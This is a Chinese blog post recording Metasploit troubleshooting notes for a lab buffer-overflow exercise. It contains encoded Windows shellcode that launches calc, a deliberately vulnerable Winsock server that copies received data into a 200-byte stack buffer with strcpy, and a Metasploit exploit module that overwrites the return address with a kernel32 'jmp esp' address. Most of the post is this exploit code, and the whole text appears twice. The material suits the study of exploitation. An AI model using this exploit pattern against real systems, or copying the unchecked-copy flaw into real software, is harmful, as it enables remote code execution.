Metasploit使用问题记录及攻击测试代码
2012-09-11 17:43
323 查看
1、利用failwest书中的例子进行测试,执行exploit后提示如下信息,说明 Payload'中的Space过小,增大即可,后面有例子程序可进行测试。
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.
2、如提示无法加载模块,说明rb文件书写语法有误,需要更改,不同的版本有可能语法也不完全相同,如下面的rb测试代码放到最新的版本中则无法加载,使用时注意。
3、目前使用metasploit3.4.0版本进行测试,测试时发现targets 中sp2及win 2000地址失效,所以用[ 'Windwos xp sp3', { 'Ret' => 0x7c86467b} ], ,0x7c86467b地址为jmp esp测试成功,使用metasploit console输入 msfpescan -f -j esp c:/windows/system32/kernel32.dll
4、metasploit常用命令:
use 模块名
set payload XX
set rhost XX
set rport XX
set exitfunc seh
set cmd calc
set payload windows/exc
5、配置的shellcode为223个字节,即上面的300可以改为223
/*
* windows/exec - 223 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
unsigned char buf[] =
"\xd9\xe5\xbd\x20\x99\xb8\x99\x31\xc9\xd9\x74\x24\xf4\x5e\xb1"
"\x32\x83\xee\xfc\x31\x6e\x13\x03\x4e\x8a\x5a\x6c\x72\x44\x13"
"\x8f\x8a\x95\x44\x19\x6f\xa4\x56\x7d\xe4\x95\x66\xf5\xa8\x15"
"\x0c\x5b\x58\xad\x60\x74\x6f\x06\xce\xa2\x5e\x97\xfe\x6a\x0c"
"\x5b\x60\x17\x4e\x88\x42\x26\x81\xdd\x83\x6f\xff\x2e\xd1\x38"
"\x74\x9c\xc6\x4d\xc8\x1d\xe6\x81\x47\x1d\x90\xa4\x97\xea\x2a"
"\xa6\xc7\x43\x20\xe0\xff\xe8\x6e\xd1\xfe\x3d\x6d\x2d\x49\x49"
"\x46\xc5\x48\x9b\x96\x26\x7b\xe3\x75\x19\xb4\xee\x84\x5d\x72"
"\x11\xf3\x95\x81\xac\x04\x6e\xf8\x6a\x80\x73\x5a\xf8\x32\x50"
"\x5b\x2d\xa4\x13\x57\x9a\xa2\x7c\x7b\x1d\x66\xf7\x87\x96\x89"
"\xd8\x0e\xec\xad\xfc\x4b\xb6\xcc\xa5\x31\x19\xf0\xb6\x9d\xc6"
"\x54\xbc\x0f\x12\xee\x9f\x45\xe5\x62\x9a\x20\xe5\x7c\xa5\x02"
"\x8e\x4d\x2e\xcd\xc9\x51\xe5\xaa\x26\x18\xa4\x9a\xae\xc5\x3c"
"\x9f\xb2\xf5\xea\xe3\xca\x75\x1f\x9b\x28\x65\x6a\x9e\x75\x21"
"\x86\xd2\xe6\xc4\xa8\x41\x06\xcd\xca\x04\x94\x8d\x0c";
#include <IOSTREAM.H>
#include <WINSOCK2.H>
#pragma comment(lib,"ws2_32.lib")
VOID msg_display(char *buf)
{
char msg[200];
strcpy(msg,buf);
cout<<"****************"<<endl;
cout<<msg<<endl;
}
void main()
{
SOCKET sock,msgsock,length,receive_len;
struct sockaddr_in sock_server,sock_client;
char buf[0x200];
WSADATA wsa;
WSAStartup(MAKEWORD(1,1),&wsa);
if ((sock=socket(AF_INET,SOCK_STREAM,0))<0)
{
cout<<sock<<"Socket Creating Error!"<<endl;
exit(1);
}
sock_server.sin_family=AF_INET;
sock_server.sin_port=htons(7777);
sock_server.sin_addr.S_un.S_addr=INADDR_ANY;
if (bind(sock,(sockaddr *)&sock_server,sizeof(sock_server)))
{
cout<<"binging stream socket error!"<<endl;
}
cout<<"**********************************"<<endl;
cout<<" exploit target server 1.0 "<<endl;
cout<<"**********************************"<<endl;
listen(sock,4);
length=sizeof(struct sockaddr);
do
{
msgsock=accept(sock,(struct sockaddr *)&sock_client,(int *)&length);
if (msgsock==1)
{
cout<<"accept error!"<<endl;
break;
}
else
do
{
memset(buf,0,sizeof(buf));
if ((receive_len=recv(msgsock,buf,sizeof(buf),0))<0)
{
cout<<"reading stream message error!"<<endl;
receive_len=0;
}
msg_display(buf);
}while(receive_len);
closesocket(msgsock);
} while (1);
WSACleanup();
}
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'JYH testing Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'JYH' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2008-0226' ],
[ 'OSVDB', '41195'],
[ 'BID', '27140' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000', { 'Ret' => 0x77F8948B } ],
[ 'Windwos xp sp2', { 'Ret' => 0x7C914393 } ],
[ 'Windwos xp sp3', { 'Ret' => 0x7c86467b} ],
],
'DefaultTarget' => 1,
'DisclosureDate' => 'Jan 4 2012'))
end
def exploit
print_status("Trying target")
connect
#sock.get_once
#print_status("Trying target #{target.name}...")
buf = 'A' * 200
buf += [ target.ret ].pack('V')
buf += payload.encoded
sock.put(buf)
handler
disconnect
end
end
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.
2、如提示无法加载模块,说明rb文件书写语法有误,需要更改,不同的版本有可能语法也不完全相同,如下面的rb测试代码放到最新的版本中则无法加载,使用时注意。
3、目前使用metasploit3.4.0版本进行测试,测试时发现targets 中sp2及win 2000地址失效,所以用[ 'Windwos xp sp3', { 'Ret' => 0x7c86467b} ], ,0x7c86467b地址为jmp esp测试成功,使用metasploit console输入 msfpescan -f -j esp c:/windows/system32/kernel32.dll
4、metasploit常用命令:
use 模块名
set payload XX
set rhost XX
set rport XX
set exitfunc seh
set cmd calc
set payload windows/exc
5、配置的shellcode为223个字节,即上面的300可以改为223
/*
* windows/exec - 223 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, CMD=calc
*/
unsigned char buf[] =
"\xd9\xe5\xbd\x20\x99\xb8\x99\x31\xc9\xd9\x74\x24\xf4\x5e\xb1"
"\x32\x83\xee\xfc\x31\x6e\x13\x03\x4e\x8a\x5a\x6c\x72\x44\x13"
"\x8f\x8a\x95\x44\x19\x6f\xa4\x56\x7d\xe4\x95\x66\xf5\xa8\x15"
"\x0c\x5b\x58\xad\x60\x74\x6f\x06\xce\xa2\x5e\x97\xfe\x6a\x0c"
"\x5b\x60\x17\x4e\x88\x42\x26\x81\xdd\x83\x6f\xff\x2e\xd1\x38"
"\x74\x9c\xc6\x4d\xc8\x1d\xe6\x81\x47\x1d\x90\xa4\x97\xea\x2a"
"\xa6\xc7\x43\x20\xe0\xff\xe8\x6e\xd1\xfe\x3d\x6d\x2d\x49\x49"
"\x46\xc5\x48\x9b\x96\x26\x7b\xe3\x75\x19\xb4\xee\x84\x5d\x72"
"\x11\xf3\x95\x81\xac\x04\x6e\xf8\x6a\x80\x73\x5a\xf8\x32\x50"
"\x5b\x2d\xa4\x13\x57\x9a\xa2\x7c\x7b\x1d\x66\xf7\x87\x96\x89"
"\xd8\x0e\xec\xad\xfc\x4b\xb6\xcc\xa5\x31\x19\xf0\xb6\x9d\xc6"
"\x54\xbc\x0f\x12\xee\x9f\x45\xe5\x62\x9a\x20\xe5\x7c\xa5\x02"
"\x8e\x4d\x2e\xcd\xc9\x51\xe5\xaa\x26\x18\xa4\x9a\xae\xc5\x3c"
"\x9f\xb2\xf5\xea\xe3\xca\x75\x1f\x9b\x28\x65\x6a\x9e\x75\x21"
"\x86\xd2\xe6\xc4\xa8\x41\x06\xcd\xca\x04\x94\x8d\x0c";
#include <IOSTREAM.H>
#include <WINSOCK2.H>
#pragma comment(lib,"ws2_32.lib")
VOID msg_display(char *buf)
{
char msg[200];
strcpy(msg,buf);
cout<<"****************"<<endl;
cout<<msg<<endl;
}
void main()
{
SOCKET sock,msgsock,length,receive_len;
struct sockaddr_in sock_server,sock_client;
char buf[0x200];
WSADATA wsa;
WSAStartup(MAKEWORD(1,1),&wsa);
if ((sock=socket(AF_INET,SOCK_STREAM,0))<0)
{
cout<<sock<<"Socket Creating Error!"<<endl;
exit(1);
}
sock_server.sin_family=AF_INET;
sock_server.sin_port=htons(7777);
sock_server.sin_addr.S_un.S_addr=INADDR_ANY;
if (bind(sock,(sockaddr *)&sock_server,sizeof(sock_server)))
{
cout<<"binging stream socket error!"<<endl;
}
cout<<"**********************************"<<endl;
cout<<" exploit target server 1.0 "<<endl;
cout<<"**********************************"<<endl;
listen(sock,4);
length=sizeof(struct sockaddr);
do
{
msgsock=accept(sock,(struct sockaddr *)&sock_client,(int *)&length);
if (msgsock==1)
{
cout<<"accept error!"<<endl;
break;
}
else
do
{
memset(buf,0,sizeof(buf));
if ((receive_len=recv(msgsock,buf,sizeof(buf),0))<0)
{
cout<<"reading stream message error!"<<endl;
receive_len=0;
}
msg_display(buf);
}while(receive_len);
closesocket(msgsock);
} while (1);
WSACleanup();
}
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'JYH testing Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'JYH' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2008-0226' ],
[ 'OSVDB', '41195'],
[ 'BID', '27140' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000', { 'Ret' => 0x77F8948B } ],
[ 'Windwos xp sp2', { 'Ret' => 0x7C914393 } ],
[ 'Windwos xp sp3', { 'Ret' => 0x7c86467b} ],
],
'DefaultTarget' => 1,
'DisclosureDate' => 'Jan 4 2012'))
end
def exploit
print_status("Trying target")
connect
#sock.get_once
#print_status("Trying target #{target.name}...")
buf = 'A' * 200
buf += [ target.ret ].pack('V')
buf += payload.encoded
sock.put(buf)
handler
disconnect
end
end
相关文章推荐
- MT6753和MT6737 4G和以太网同时使用问题,测试记录
- 2017-02问题记录总结:linux下网络收发包性能测试代码、.bin和.elf文件格式区别
- eclipse中使用mybatis-generator逆向代码生成工具问题解决记录
- Working Practice-使用清单记录总结代码审核的问题
- 使用CMAKE编译单元测试代码发现如下问题
- Spring学习笔记(二十一):使用阿里云OSS的javaSDK时遇到的问题(附:测试代码)
- 【记录】使用eclipse遇到的问题一:eclipse中按空格/Tab键错误触发代码补全
- 使用curl测试host头攻击时候遇到的问题
- Redis 单点模式和集群模式代码测试及问题记录
- eclipse中使用mybatis-generator逆向代码生成工具问题解决记录
- 使用eclipse编译jni代码遇到的问题记录
- 记录eclipse 外部导入的工程无法使用自己定义的代码风格问题
- 使用jUnit对代码进行测试以及测试过程中遇到的问题
- java代码使用ftp上传图片失败的一个问题
- 使用ZXing的二维码扫描和生成问题记录
- 自编译pgmodeler使用过程问题记录
- ado.net 操作excel 问题记录 -- 操作必须使用一个可更新的查询
- 问题记录:想要替换别人的代码,但是没办法或不能修改别人的代码
- 记录一段使用socket 回复的http json的请求代码
- mysql使用问题记录